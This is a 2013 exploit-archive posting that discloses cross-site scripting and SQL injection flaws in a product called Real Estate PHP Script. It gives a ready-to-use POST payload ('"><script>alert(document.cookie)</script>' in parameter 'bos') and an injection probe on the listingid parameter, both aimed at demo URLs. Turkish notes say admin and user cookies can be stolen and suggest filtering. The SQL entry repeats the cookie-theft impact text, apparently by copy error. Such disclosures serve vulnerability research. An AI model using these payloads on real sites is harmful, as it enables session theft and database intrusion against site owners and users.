Home / exploits Real Estate PHP Script Cross Site Scripting
Posted on 10 September 2013
**********************Cross Site Scripting******************* < ------------------- header data start ------------------- > ############################################################# # Application Name : Real Estate Php Script # Vulnerable Type : Post Cross Site Scripting # Infection : Yönetici ve User cookie’leri çalýnabilir. # Bug Fix Advice : Zararlý karakterler filtrelenmelidir. # Author : Lazmania61 | Bug Researchers # Example : http://real-estate-php-script.com/demo/search_residential.php ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > Post Parameter Name = bos Post Parameter Value = "><script>alert(document.cookie)</script> < -- bug code end of -- > **********************SqL Injection******************* < ------------------- header data start ------------------- > ############################################################# # Application Name : Real Estate Php Script # Vulnerable Type : SqL Injection # Infection : Yönetici ve User cookie’leri çalýnabilir. # Bug Fix Advice : Zararlý karakterler filtrelenmelidir. # Author : Lazmania61 | Bug Researchers # Example : http://real-estate-php-script.com/demo/property_listings_detail.php?listingid=8499 ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > http://real-estate-php-script.com/demo/property_listings_detail.php?listingid=8499’a < -- bug code end of -- >
